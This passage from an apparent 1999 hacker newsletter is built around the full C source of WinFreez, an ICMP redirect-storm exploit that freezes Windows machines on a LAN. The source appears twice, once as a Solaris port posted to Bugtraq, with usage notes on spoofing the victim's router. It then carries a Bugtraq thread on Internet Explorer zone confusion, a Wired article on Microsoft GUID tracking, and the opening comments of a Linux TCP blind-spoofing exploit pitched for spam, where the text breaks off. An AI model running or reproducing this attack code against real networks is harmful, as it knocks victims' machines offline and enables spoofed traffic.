bits of data */ } id_ip; u_long id_mask; char id_data[1]; } icmp_dun; #define icmp_otime icmp_dun.id_ts.its_otime #define icmp_rtime icmp_dun.id_ts.its_rtime #define icmp_ttime icmp_dun.id_ts.its_ttime #define icmp_ip icmp_dun.id_ip.idi_ip #define icmp_mask icmp_dun.id_mask #define icmp_data icmp_dun.id_data }; u_short in_cksum (u_short *addr, int len); void attack( char *sendtoip, char *sendfromip, time_t wtime, int s ); void main (int argc, char **argv) { time_t wtime; char *sendtoip, *sendfromip; int s, on; if (argc != 4) { fprintf (stderr, "usage: %s sendto sendfrom time\n", argv[0]); exit (1); } sendtoip = (char *)malloc(strlen(argv[1]) + 1); strcpy(sendtoip, argv[1]); sendfromip = (char *)malloc(strlen(argv[2]) + 1); strcpy(sendfromip, argv[2]); wtime = atol(argv[3]); if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { fprintf (stderr, "socket creation error\n" ); exit (1); } #ifdef IP_HDRINCL if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, &on, sizeof (on)) < 0) { fprintf (stderr, "sockopt IP_HDRINCL error\n" ); exit (1); } #endif printf("winfreez by Delmore, <delmore@moscowmail.com>\n"); printf("Soldiers Of Satan group, http://sos.nanko.ru\n\n"); printf("sendto = %s\n", sendtoip); printf("sendfrom = %s\n", sendfromip); printf("time = %i s\n", wtime); attack( sendtoip, sendfromip, wtime, s ); free( (void *) sendtoip ); free( (void *) sendfromip ); } void attack( char *sendtoip, char *sendfromip, time_t wtime, int s ) { time_t curtime, endtime; int i1, i2, i3, i4; char redir[21]; char buf[100]; struct ip *ip = (struct ip *) buf; struct icmp *icmp = (struct icmp *) (ip + 1); struct hostent *hp; struct sockaddr_in dst; if(wtime==0) return; if ((hp = gethostbyname (sendtoip)) == NULL) if ((ip->ip_dst.s_addr = inet_addr (sendtoip)) == -1) { fprintf (stderr, "%s: unknown sendto\n", sendtoip); exit (1); } if ((hp = gethostbyname (sendfromip)) == NULL) if ((ip->ip_src.s_addr = inet_addr (sendfromip)) == -1) { fprintf (stderr, "%s: unknown sendfrom\n", sendfromip); exit (1); } endtime = time(NULL) + wtime; srand((unsigned int) endtime); do { bzero (buf, sizeof buf); /* sendto/gateway */ hp = gethostbyname (sendtoip); bcopy (hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length); bcopy (hp->h_addr_list[0], &icmp->icmp_gwaddr.s_addr, hp->h_length); /* sendfrom */ hp = gethostbyname (sendfromip); bcopy (hp->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length); /* generate redirect*/ i1 = 1+(int) (223.0*rand()/(RAND_MAX+1.0)); i2 = 1+(int) (253.0*rand()/(RAND_MAX+1.0)); i3 = 1+(int) (253.0*rand()/(RAND_MAX+1.0)); i4 = 1+(int) (253.0*rand()/(RAND_MAX+1.0)); bzero (redir, sizeof redir); sprintf(redir,"%u.%u.%u.%u", i4, i3, i2, i1 ); hp = gethostbyname (redir); bcopy (hp->h_addr_list[0], &icmp->icmp_ip.ip_dst.s_addr, hp->h_length); ip->ip_v = 4; ip->ip_hl = sizeof *ip >> 2; ip->ip_tos = 0; ip->ip_len = htons (sizeof buf); ip->ip_id = htons (4321); ip->ip_off = 0; ip->ip_ttl = 255; ip->ip_p = 1; ip->ip_sum = 0; /* kernel fills this in */ bcopy (&ip->ip_dst.s_addr, &icmp->icmp_ip.ip_src.s_addr, sizeof(ip->ip_dst.s_addr)); icmp->icmp_ip.ip_v = 4; icmp->icmp_ip.ip_hl = sizeof *ip >> 2; icmp->icmp_ip.ip_tos = 0; icmp->icmp_ip.ip_len = htons (100); /* doesn't matter much */ icmp->icmp_ip.ip_id = htons (3722); icmp->icmp_ip.ip_off = 0; icmp->icmp_ip.ip_ttl = 254; icmp->icmp_ip.ip_p = 1; icmp->icmp_ip.ip_sum = in_cksum ((u_short *) & icmp->icmp_ip, sizeof *ip); dst.sin_addr = ip->ip_dst; dst.sin_family = AF_INET; icmp->icmp_type = ICMP_REDIRECT; icmp->icmp_code = 1; /* 1 - redirect host, 0 - redirect net */ icmp->icmp_cksum = in_cksum ((u_short *) icmp, sizeof (buf) - sizeof(*ip)); if( sendto( s, buf, sizeof buf, 0, (struct sockaddr *) &dst, sizeof dst) < 0 ) { fprintf (stderr, "sendto error\n"); exit (1); } }while (time(NULL)!=endtime); } /* * in_cksum -- Checksum routine for Internet Protocol family headers (C * Version) - code from 4.4 BSD */ u_short in_cksum (u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) w; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return (answer); } -=- And a Solaris version: Date: Tue, 9 Mar 1999 22:34:32 -0500 From: Max Schubert <mschube@jgvandyke.com> To: BUGTRAQ@netspace.org Subject: Winfreeze.c for Solaris ... Hi, Script kiddie number 25006 here :) ... apologize if this is too trivial to be worth your time .... This is just a port of the Winfreeze.c ICMP redirect exploit for Solaris (posted earlier today) ... tested using Solaris 2.5.1 ... max ------- /* WinFreez.c by Delmore <delmore@moscowmail.com> ICMP/Redirect-host message storm freeze Win9x/NT(sp4) box in LAN. Usage: winfreez sendtoip sendfromip time where <sendtoip> is victim host, <sendfromip> is router for victim host, <time> is time in seconds to freeze victim. Note: I've written small exploit for freeze win9x/nt boxes in LAN. Proggy initiates ICMP/Redirect-host messages storm from router (use router ip). Windows will receive redirect-host messages and change own route table, therefore it will be frozen or slowly working during this time. On victim machine route table changes viewing with: ROUTE PRINT command in ms-dos box. Exploit show different result for different system configuration. System results: p200/16ram/win95osr2 is slowly execute application after 20 seconds of storm. p233/96ram/nt4-sp4 is slowly working after 30 seconds of storm. p2-266/64ram/win95 working slowly and can't normal execute application. Compiled on RedHat Linux 5, Kernel 2.0.35 (x86) gcc ./winfreez.c -o winfreez --- for Slackware Linux, Kernel 2.0.30 If you can't compile due to ip_sum not defined errors, replace (line 207): ip->ip_sum = 0; to line: ip->ip_csum = 0; --- Soldiers Of Satan group Russia, Moscow State University, 05 march 1999 http://sos.nanko.ru Thanx to Mark Henderson. */ #include <stdio.h> #include <stdlib.h> #include <time.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> #include <errno.h> /* * Structure of an icmp header (from sparc header). */ u_short in_cksum (u_short *addr, int len); void attack( char *sendtoip, char *sendfromip, time_t wtime, int s ); void main (int argc, char **argv) { time_t wtime; /* setsockopt on Solaris 2.5.1 wants (char *) for 4th arg */ char *sendtoip, *sendfromip, *on; int s; if (argc != 4) { fprintf (stderr, "usage: %s sendto sendfrom time\n", argv[0]); exit (1); } sendtoip = (char *)malloc(strlen(argv[1]) + 1); strcpy(sendtoip, argv[1]); sendfromip = (char *)malloc(strlen(argv[2]) + 1); strcpy(sendfromip, argv[2]); wtime = atol(argv[3]); if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { fprintf (stderr, "socket creation error: %s\n", strerror(errno)); exit (1); } #ifdef IP_HDRINCL if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof (on)) < 0) { fprintf (stderr, "sockopt IP_HDRINCL error\n" ); exit (1); } #endif printf("winfreez by Delmore, <delmore@moscowmail.com>\n"); printf("Soldiers Of Satan group, http://sos.nanko.ru\n\n"); printf("sendto = %s\n", sendtoip); printf("sendfrom = %s\n", sendfromip); printf("time = %i s\n", wtime); attack( sendtoip, sendfromip, wtime, s ); free( (void *) sendtoip ); free( (void *) sendfromip ); } void attack( char *sendtoip, char *sendfromip, time_t wtime, int s ) { time_t curtime, endtime; int i1, i2, i3, i4; char redir[21]; char buf[100]; struct ip *ip = (struct ip *) buf; struct icmp *icmp = (struct icmp *) (ip + 1); struct hostent *hp; struct sockaddr_in dst; if(wtime==0) return; if ((hp = gethostbyname (sendtoip)) == NULL) if ((ip->ip_dst.s_addr = inet_addr (sendtoip)) == -1) { fprintf (stderr, "%s: unknown sendto\n", sendtoip); exit (1); } if ((hp = gethostbyname (sendfromip)) == NULL) if ((ip->ip_src.s_addr = inet_addr (sendfromip)) == -1) { fprintf (stderr, "%s: unknown sendfrom\n", sendfromip); exit (1); } endtime = time(NULL) + wtime; srand((unsigned int) endtime); do { bzero (buf, sizeof buf); /* sendto/gateway */ hp = gethostbyname (sendtoip); bcopy (hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length); bcopy (hp->h_addr_list[0], &icmp->icmp_gwaddr.s_addr, hp->h_length); /* sendfrom */ hp = gethostbyname (sendfromip); bcopy (hp->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length); /* generate redirect*/ i1 = 1+(int) (223.0*rand()/(RAND_MAX+1.0)); i2 = 1+(int) (253.0*rand()/(RAND_MAX+1.0)); i3 = 1+(int) (253.0*rand()/(RAND_MAX+1.0)); i4 = 1+(int) (253.0*rand()/(RAND_MAX+1.0)); bzero (redir, sizeof redir); sprintf(redir,"%u.%u.%u.%u", i4, i3, i2, i1 ); hp = gethostbyname (redir); bcopy (hp->h_addr_list[0], &icmp->icmp_ip.ip_dst.s_addr, hp->h_length); ip->ip_v = 4; ip->ip_hl = sizeof *ip >> 2; ip->ip_tos = 0; ip->ip_len = htons (sizeof buf); ip->ip_id = htons (4321); ip->ip_off = 0; ip->ip_ttl = 255; ip->ip_p = 1; ip->ip_sum = 0; /* kernel fills this in */ bcopy (&ip->ip_dst.s_addr, &icmp->icmp_ip.ip_src.s_addr, sizeof (ip->ip_dst.s_addr)); icmp->icmp_ip.ip_v = 4; icmp->icmp_ip.ip_hl = sizeof *ip >> 2; icmp->icmp_ip.ip_tos = 0; icmp->icmp_ip.ip_len = htons (100); /* doesn't matter much */ icmp->icmp_ip.ip_id = htons (3722); icmp->icmp_ip.ip_off = 0; icmp->icmp_ip.ip_ttl = 254; icmp->icmp_ip.ip_p = 1; icmp->icmp_ip.ip_sum = in_cksum ((u_short *) & icmp->icmp_ip, sizeof *ip); dst.sin_addr = ip->ip_dst; dst.sin_family = AF_INET; icmp->icmp_type = ICMP_REDIRECT; icmp->icmp_code = 1; /* 1 - redirect host, 0 - redirect net */ icmp->icmp_cksum = in_cksum ((u_short *) icmp, sizeof (buf) - sizeof (*ip)); if( sendto( s, buf, sizeof buf, 0, (struct sockaddr *) &dst, sizeof dst) < 0 ) { fprintf (stderr, "sendto error\n"); exit (1); } }while (time(NULL)!=endtime); } /* * in_cksum -- Checksum routine for Internet Protocol family headers (C * Version) - code from 4.4 BSD */ u_short in_cksum (u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) w; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return (answer); } @HWA 04.5 Unknown Zone: Windows doesn't properly distinguish between intra and internet zones ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Fri, 5 Mar 1999 21:53:18 -0500 From: Jim Paris <jim@JTAN.COM> To: BUGTRAQ@netspace.org Subject: More Internet Explorer zone confusion Even after the patch described in Microsoft Security Bulletin MS98-016 (http://www.microsoft.com/security/bulletins/ms98-016.asp), IE4 still has big problems with distinguishing between sites that belong in the "Internet Zone" and sites that belong in the "Local Intranet Zone". MS98-016 dealt with addresses such as http://031713501415/, which resolve to Internet hosts but are categorized as being in the "Local Intranet Zone". I've found two cases where the problem still exists. The first is when the user has the "Domain Suffix Search Order" in the TCP/IP DNS settings set to include domains such as "com". In that case, the address http://microsoft/ will retrieve the page at http://microsoft.com/ but it will be considered to be in the "Local Intranet Zone". The second case occurs when a host has an assigned alias in the hosts table (C:\WINDOWS\HOSTS). A host table entry such as: 207.46.131.13 hello will cause the URL http://hello/ to retrieve the page at http://207.45.131.13/, but (yep, you guess it) Internet Explorer still considers it to be in the "Local Intranet Zone". This has security implications, since settings for the Local Intranet Zone may be (and, by default, ARE) less secure than those for the Internet Zone. And the funny part? Microsoft's response when I told them this: --8<---cut here----------------------------------------- Hi Jim - Had a talk with one of the IE developers, and this behavior is correct. Here's why: it's impossible to tell from an IP address whether it's internal or external. 100.100.100.100, or any other address, could be either internal or external, depending on whether you're behind a firewall or not. That means that IE has to rely on the URL. By convention, an URL that does not end with a "dot-something" (.com, .edu, .gov, etc) is assumed to be an internal site. I'm told that this is how all web browsers make the distinction. You have to make specific reconfigurations to allow the dotless URLs to resolve externally. Thanks, Secure@Microsoft.Com --8<---cut here----------------------------------------- "This behavior is correct"?!?!?! Give me a break. They obviously didn't think so when they released the MS98-016 bulletin. Jim Paris jim@jtan.com -------------------------------------------------------------------------------- Date: Mon, 8 Mar 1999 03:56:27 -0500 From: Jeremy Nimmer <bugtraq.user@parity.mit.edu> To: BUGTRAQ@netspace.org Subject: Re: More Internet Explorer zone confusion >MS98-016 dealt with addresses such as http://031713501415/ >... >user has the "Domain Suffix Search Order" in the TCP/IP DNS settings >... >The second case occurs when a host has an assigned alias in the hosts >... >"This behavior is correct"?!?!?! Give me a break. They obviously >didn't think so when they released the MS98-016 bulletin. > >Jim Paris >jim@jtan.com The difference between MS98-016 and your examples is simple. The bulletin addressed an issue where an external site could, without your control, fool your browser into thinking a remote site was "local intranet". In your examples, the user must choose specific settings to allow the problem to occur. If you are concerned about the problem, simply remove .com, etc. >from your DNS suffix search, and don't put nasty hosts in your hosts file. The zone settings are not meant to be rock-solid security protection. If they pose a risk to you, set all zones to the maximum security. This was all already talked about when the above-mentioned bulletin came out. In the end, this is not a "bug" in the browser - it's a configuration problem. While worthy of mention, it does not deserve flamage. Thanks, -= remmiN ymereJ | Jeremy Nimmer =- -------------------------------------------------------------------------------- Date: Mon, 8 Mar 1999 23:37:28 +1300 From: Oliver Lineham <oliver@LINEHAM.CO.NZ> To: BUGTRAQ@netspace.org Subject: Re: More Internet Explorer zone confusion At 21:53 5/03/99 -0500, you wrote: Yech. >That means that IE has to rely on the URL. By convention, an URL that does >not end with a "dot-something" (.com, .edu, .gov, etc) is assumed to be an >internal site. I'm told that this is how all web browsers make the >distinction. You have to make specific reconfigurations to allow the >dotless URLs to resolve externally. Thanks, This is insane - and most probably not how it distinguishes domains at all. Such a system implies that the "dot-something"s are hard-coded into the browser! This would be a similar flaw to the original cookie specification's one about domains that I announced last year. Consider: - Country domains. They're not dot-somethings, but under this regime anything from somewhere like New Zealand (.nz) would be a "Local Intranet Site". - New TLDs. Internic goes and adds a .web or .store or something that didn't exist when the browser was released. I'm sure all the e-commerce sites on .store would love their servers being considered "Local Intranet Sites"! If this is how the zones are implemented, then its insane. If not, then IE's claim of being able to distinguish intranet sites from internet ones is an outright lie and the "feature" should be removed. Oliver --------------------------------------------------- Internet Services / Webdesign / Strategic Planning PO Box 30-481, Lower Hutt, NZ oliver@lineham.co.nz Phone +64 4 566-0627 Facsimile +64 4 570-1900 -------------------------------------------------------------------------------- Date: Mon, 8 Mar 1999 09:06:23 +0000 From: David E. Smith <dave@TECHNOPAGAN.ORG> To: BUGTRAQ@netspace.org Subject: Re: More Internet Explorer zone confusion On Fri, 5 Mar 1999, Jim Paris wrote about the Local Intranet Zone. All the comments made are, technically, correct, but Microsoft could have at least tried. None of these are foolproof, but they're a start. * Be paranoid about entries in the hosts file. Arguably, hosts files are obsolete, thanks to DNS. (No, I won't make the argument.) * Warning dialog boxes for the above, and maybe for anything where the TLD is guessed at. (The http://microsoft/ example. Just warn the user that the requested site was guessed, give some sane options like `Go there, treat it as Internet', `Go there, treat it as local', `Don't go there', and so on.) * Anything that doesn't resolve to a designated local zone (10.*.*.*, and the other reserved addresses) gets the same warning. Or, just change the default behaviour on all those to treat the site as Internet rather than intranet. Probably easier that way, though a bit more troublesome for the user, especially when we guess wrong. Care to take bets on whether anything even remotely like this is ever done? ...dave -------------------------------------------------------------------------------- Date: Mon, 8 Mar 1999 00:18:10 -0800 From: Walt Armour <walt@BLARG.NET> To: BUGTRAQ@netspace.org Subject: Re: More Internet Explorer zone confusion I would agree that these are still issues but there is a difference between them and the original problem. With the original problem any site could redirect you to a site and make it look like Local Intranet simply by using the 'http://031713501415/' format. With these two new issues someone must have direct knowledge about your machine's configuration or have direct access to your machine in order to make a not-quite-too-common configuration change. If either of these situations occurs then the safety level of my browser will quickly become the least of my worries. :) IMO Microsoft is right in saying that the problems are (marginally) different. Whether or not their method for determining "local intranet" is right is a completely different subject. walt -------------------------------------------------------------------------------- Date: Mon, 8 Mar 1999 11:07:19 -0600 From: iversen <signal11@MEDIAONE.NET> To: BUGTRAQ@netspace.org Subject: Re: More Internet Explorer zone confusion Oliver Lineham wrote: > - New TLDs. Internic goes and adds a .web or .store or something that > didn't exist when the browser was released. I'm sure all the e-commerce > sites on .store would love their servers being considered "Local Intranet > Sites"! > > If this is how the zones are implemented, then its insane. If not, then > IE's claim of being able to distinguish intranet sites from internet ones > is an outright lie and the "feature" should be removed. This seems to be trivial to resolve - put everything in the internet zone unless it matches a list containing the local intranets. Then do reverse-dns of everything that's allegedly inside the intranet and make sure everything matches up. It isn't a perfect solution, but it would make it substantially harder to fake a remote site as local. You also get the added benefit of not needing to worry about how IE resolves domains/ip addresses. -- signal11@mediaone.net | BOFH, Malign networks I'll give you the TCO of Linux as soon as my calculator stops saying "divide by zero error." -------------------------------------------------------------------------------- Date: Mon, 8 Mar 1999 14:17:43 -0500 From: Jim Paris <jim@JTAN.COM> To: BUGTRAQ@netspace.org Subject: Re: More Internet Explorer zone confusion > The difference between MS98-016 and your examples is simple. The bulletin > addressed an issue where an external site could, without your control, fool > your browser into thinking a remote site was "local intranet". And this can occur with my examples as well. I didn't control it at all. > In your > examples, the user must choose specific settings to allow the problem to > occur. If you are concerned about the problem, simply remove .com, etc. > from your DNS suffix search, and don't put nasty hosts in your hosts file. Just because I added a DNS suffix search order and put hosts into my hosts file does not (or, at least, SHOULD not) mean that I am choosing "specific settings to allow the problem to occur". How was I supposed to know that simplifying my life by adding a search suffix of ".com" was opening me up to a vulnerability? > In the end, this is not a "bug" in the browser - it's a configuration > problem. While worthy of mention, it does not deserve flamage. No, this is a bug in the browser. Changing something over at point A shouldn't affect my security at point B. -jim -------------------------------------------------------------------------------- Date: Mon, 8 Mar 1999 11:58:55 -0800 From: Paul Leach <paulle@MICROSOFT.COM> To: BUGTRAQ@netspace.org Subject: Re: More Internet Explorer zone confusion > -----Original Message----- > From: Oliver Lineham [mailto:oliver@LINEHAM.CO.NZ] > Sent: Monday, March 08, 1999 2:37 AM > To: BUGTRAQ@NETSPACE.ORG > Subject: Re: More Internet Explorer zone confusion > > > At 21:53 5/03/99 -0500, you wrote: > > Yech. > > >That means that IE has to rely on the URL. By convention, > an URL that does > >not end with a "dot-something" (.com, .edu, .gov, etc) is > assumed to be an > >internal site. I'm told that this is how all web browsers make the > >distinction. You have to make specific reconfigurations to allow the > >dotless URLs to resolve externally. Thanks, > > This is insane - and most probably not how it distinguishes > domains at all. That's correct. I believe that the rule for Intranet zone is simple -- if the name has no "." and is less than 15 characters long, then it's Intranet zone. This algorithm works with the default configuration of Windows. If you configure your machine so that the above assumption is violated, then you'll get a mis-classification. When designing better ways of doing this, keep in mind that the primary tool that the browser has to work with is "gethostbyname" -- which, IMO, doesn't return enough information about how the name was resolved to be helpful for security purposes (even though it garnered some in the process of resolution). For example, it doesn't say whether /etc/hosts or LMHOSTS was used to resolve the name, or which DNS search suffix was used. Paul -------------------------------------------------------------------------------- Date: Mon, 8 Mar 1999 19:49:32 -0600 From: Jeremie <jer@JEREMIE.COM> To: BUGTRAQ@netspace.org Subject: Re: More Internet Explorer zone confusion (new issue) > The assumptions may indeed be flawed, but I don't understand how your > observations below demonstrate that. The assumption: [if the name has no "." and is less than 15 characters long, then it's Intranet zone] Simply: The name "ls" has no "." and is less than 15 characters, and yet it is a valid *Internet* host and should *not* be qualified as "Intranet Zone". Jeremie jer@jeremie.com -------------------------------------------------------------------------------- Date: Tue, 9 Mar 1999 01:59:08 -0500 From: Christopher Masto <chris@NETMONGER.NET> To: BUGTRAQ@netspace.org Subject: Re: More Internet Explorer zone confusion Is this intranet zone thing _really_ of any value? Why is there a built-in default assumption that something from a "local" server is more trustworthy? Consider the following situations: 1. A customer of your ISP, netmonger.net, is evil. They have a page that links or redirects to http://www/~evil/evil.html, taking advantage of the fact that your machine is configured with your ISP's domain in the search list. 2. You go to school at RPI. You have a dorm ethernet connection. Your machine is naive.dorm.rpi.edu, and you have dorm.rpi.edu in your domain search list. An evil person gets evil.dorm.rpi.edu, and you know the rest. 3. You work at Giganticorp and have access to high-level trade secrets. Giganticorp has an intranet where employees can put up their own web pages. An evil employee takes advantage of the default security settings to gain access to your secrets, which he sells to the competition. Numbers 1 and 2 ask the question, "Why are we assuming that a non-qualified host name implies intranet implies trust?" Number 3 asks the question, "Why are we assuming that intranet implies trust?" Another question is "How many people who use IE have no intranet?" Considering that there are a quantity of tools available to deploy IE at your company with preconfigured settings, why not default to not having this intranet zone. If Giganticorp needs to turn down the security, they can do so at the same time they're customizing the rest of the settings. I don't personally use Microsoft products, and I am not quite familiar with the specific security precautions that are disabled for the intranet zone, but if they're enough to cause concern on the Internet, the same problems can occur even when the browser isn't malfunctioning at all. -- Christopher Masto Director of Operations NetMonger Communications chris@netmonger.net info@netmonger.net http://www.netmonger.net Free yourself, free your machine, free the daemon -- http://www.freebsd.org/ -------------------------------------------------------------------------------- Date: Tue, 9 Mar 1999 08:58:43 +0100 From: Tilman Schmidt <Tilman.Schmidt@SEMA.DE> To: BUGTRAQ@netspace.org Subject: Re: More Internet Explorer zone confusion At 11:07 08.03.99 -0600, iversen wrote: >Oliver Lineham wrote: >> If this is how the zones are implemented, then its insane. If not, then >> IE's claim of being able to distinguish intranet sites from internet ones >> is an outright lie and the "feature" should be removed. > >This seems to be trivial to resolve - put everything in the internet zone >unless it matches a list containing the local intranets. Then do >reverse-dns >of everything that's allegedly inside the intranet and make sure everything >matches up. This is of course the correct way to implement an "intranet zone". It has, however, one serious drawback: you have to configure it. Consumer product manufacturers like Microsoft want their product to work as much "out of the box" as possible. However, IMHO there is no way to implement the concept of "intranet zone" reliably without actually telling the browser the exact extent of your intranet one way or other. Heuristics like "if there is no dot in the hostname then let's assume it is in the intranet" just aren't reliable enough to base a security mechanism on. At Mon, 8 Mar 1999 11:58:55 -0800, Paul Leach wrote: >I believe that the rule for Intranet zone is simple -- if the name has no >"." and is less than 15 characters long, then it's Intranet zone. This >algorithm works with the default configuration of Windows. If you configure >your machine so that the above assumption is violated, then you'll get a >mis-classification. It doesn't even work with the default configuration of Windows, because the basic assumption that every host with an FQDN in the same DNS domain as the client is also in the intranet zone is flawed. There are perfectly legitimate configurations where this is not the case. >When designing better ways of doing this, keep in mind that the primary tool >that the browser has to work with is "gethostbyname" -- which, IMO, doesn't >return enough information about how the name was resolved to be helpful for >security purposes (even though it garnered some in the process of >resolution). For example, it doesn't say whether /etc/hosts or LMHOSTS was >used to resolve the name, or which DNS search suffix was used. It is irrelevant how the name was resolved. You need a mechanism to specify the intended scope of your intranet unambiguously, instead of relying on some unspoken assumption like "for our purposes, 'intranet zone' will be taken to mean all hosts which happen to have at least one FQDN in the same domain as the client". -- Tilman Schmidt E-Mail: Tilman.Schmidt@sema.de (office) Sema Group Koeln, Germany tilman@schmidt.bn.uunet.de (private) "newfs leaves the filesystem in a well known state (empty)." - Henrik Nordstrom -------------------------------------------------------------------------------- Date: Tue, 9 Mar 1999 17:15:07 -0500 From: Jim Frost <jimf@FROSTBYTES.COM> To: BUGTRAQ@netspace.org Subject: Re: More Internet Explorer zone confusion |This is of course the correct way to implement an "intranet zone". |It has, however, one serious drawback: you have to configure it. |Consumer product manufacturers like Microsoft want their product |to work as much "out of the box" as possible. Since there is no intranet for most consumers this seems like largely a non-issue. Those with intranets in their home probably know enough to configure it properly. And businesses should have IT departments whose job it is to manage it. So what's the problem? |It doesn't even work with the default configuration of Windows, |because the basic assumption that every host with an FQDN in the |same DNS domain as the client is also in the intranet zone is |flawed. There are perfectly legitimate configurations where this |is not the case. Not only legitimate, but increasingly common. Cable modem customers, for instance, tend to have their entire region in the same "intranet": eg customer.ne.mediaone.net. I assure you that you don't want to treat the entire northeast region of MediaOne customers as trusted in any way, shape, or form. jim @HWA 04.6 Sniffing out MS Security Glitch the GUID (and how to defeat it?) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "If Microsoft starts compelling people to register, then its going to take a lot of time for people to disentangle their lives from Microsoft's sticky tentacles." From Wired/ZDNET http://www.wired.com/news/news/technology/story/18331.html Sniffing Out MS Security Glitch by Chris Oakes 5:30 p.m. 8.Mar.99.PST A security vulnerability that hides unique identifiers in Microsoft Office documents may affect files created by other software applications, according to the programmer who identified the breach. Other Office documents and browser cookies, and possibly even software from other companies, can store the unique identity codes, according to Richard Smith, president of Phar Lap Software in Cambridge, Massachusetts, who first reported the security glitch on Sunday. Smith discovered that Excel and Word applications fingerprint files with an identifying number. That number is used by the hardware that connects a PC to a local area network. The 32-digit numbers were designed long ago by developers of networking hardware to identify individual machines. "These things are slippery. These [numbers] are floating around -- it's hard to say where they're showing up," said Smith. Microsoft was not available for comment. The identifying number is trapped in the Windows registry file as a Globally Unique Identifier, or GUID, and embedded in a hidden part of documents created using Office, including Word, Excel, and PowerPoint. "I got email for someone mentioning that GUIDs are also put in Web-browser cookies. I did a quick scan on my Netscape cookies file and found a number of Web sites that were indeed using GUIDs for identification purposes," Smith said. It goes to show the ubiquity of the ID numbers, he said. "Anyone writing applications can use them. [The privacy issue] is an unintended side effect." The unique number can be easily traced to a person by searching for the number in documents known to be created by that person, according to Smith. Unknown documents could also be associated with that person using the identification number. "If you're in some really weird office-politics situation -- who knows?" he said. He plans to explore whether other Windows applications, such as software for creating Web pages, use the ID numbers. He's also interested in the behavior of the company's Outlook email software. Smith said users can easily find their own network address, then search their hard-disk content for documents containing the ID number to determine where it is surreptitiously stored. Users can find the number by selecting the Run command under the Windows Start menu and typing winipcfg to launch the Windows IP configuration utility. One of the fields appearing in the dialog box contains the user's "network adapter" address. "All I did was have a search utility scan the hard disk for occurrences of the Ethernet address," he said. Smith used one called Grep. "Anyone can do that and see how common it is." Certain types of text editors, known as hexadecimal editors, will reveal the invisible code in any file. One example of the editor is HexEdit. Smith made a related discovery when he found Microsoft was collecting the identification number users entered when registering their new copies of the company's Windows 98 operating system, prompting Microsoft to post an open letter to its customers. It said the company would publish software to remove the ID number from users' Windows registry file, a move designed to prevent the behavior from occurring in future documents. The company also said a subsequent update of Windows 98 would disable the software's registration feature so that the hardware ID would not be collected "unless the user checks the option to send hardware information to Microsoft." The company said it also plans to post a software tool on its Web site that will allow users to delete hardware-registration information from the Windows registry. But in a privacy advisory also issued Monday, a privacy-watchdog group demanded that Microsoft go further. "What I think is unprecedented here is that the problem is now on billions of documents around the world. The problem remains out there even if Microsoft fixed the applications," said Jason Catlett, president of Junkbusters. "We demand they publish and publicize free software to protect these files -- and that's not something Microsoft in its open letter said it would do. "[Users] really don't have an effective means of stopping [the problem] from happening short of switching to [another software product like] Corel WordPerfect," he said. Smith and privacy advocates worry that Microsoft already has built up a database of registration numbers, although the company said it plans to purge its own databases of any hardware-identification information that may have been inadvertently gathered without customers' consent. Microsoft said it was confident "that the hardware information is not being stored in our marketing databases, and we are investigating whether it is stored in any database at all within Microsoft." Catlett believes an independent auditor should oversee any such effort to purge the data, which could have been transferred to backup systems or related databases. "For me, the bottom line is Microsoft is getting information off of people's computer [that] they have no business getting." Addressing that issue, he said, "sounds like a patch to me." Catlett is disturbed by this wide-reaching impact. Combined with Microsoft's push for required registration, a possibility Catlett documented last week, he sees a quagmire for users trying to protect themselves. "If Microsoft starts compelling people to register, then its going to take a lot of time for people to disentangle their lives from Microsoft's sticky tentacles." And From HNN March 12th: contributed by spitfire Are you worried about the Microsoft Global Unique Identifier? You know, that number that is based on your MAC address, is embedded in all your documents and is transmitted to Redmond whenever you visit the Microsoft web site or register a product? Well Vector Development claims to have the solution, Guideon. Guideon claims to replace the GUID string with zeros or an optional string you choose. <sounds interesting, I could think of some choice strings, to replace the GUID with ... *grin* -Ed > Vector Development http://www.vecdev.com/guideon.html @HWA 05.0 Linux TCP flaw exploit code for Linux 2.0.35 and older. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* linux 2.0.35 and older * tcp flaw exploit (discovered by network associates, october 1998) * by scut (990310) * * description: linux does send the tcp data received in the SYN_RECEIVED * state if a FIN packet is send * affect: blind spoofing on linux systems with kernel version below 2.0.35 * useful for: SMTP spoofing (for the lamers to spam) * FTP/Telnet spoofing * for the lamers: no, you cannot spoof your mIRC with this * * for compilation you need libnet, a low level network library from route, * go to http://www.infonexus.com/~daemon9/ * then try with: * * 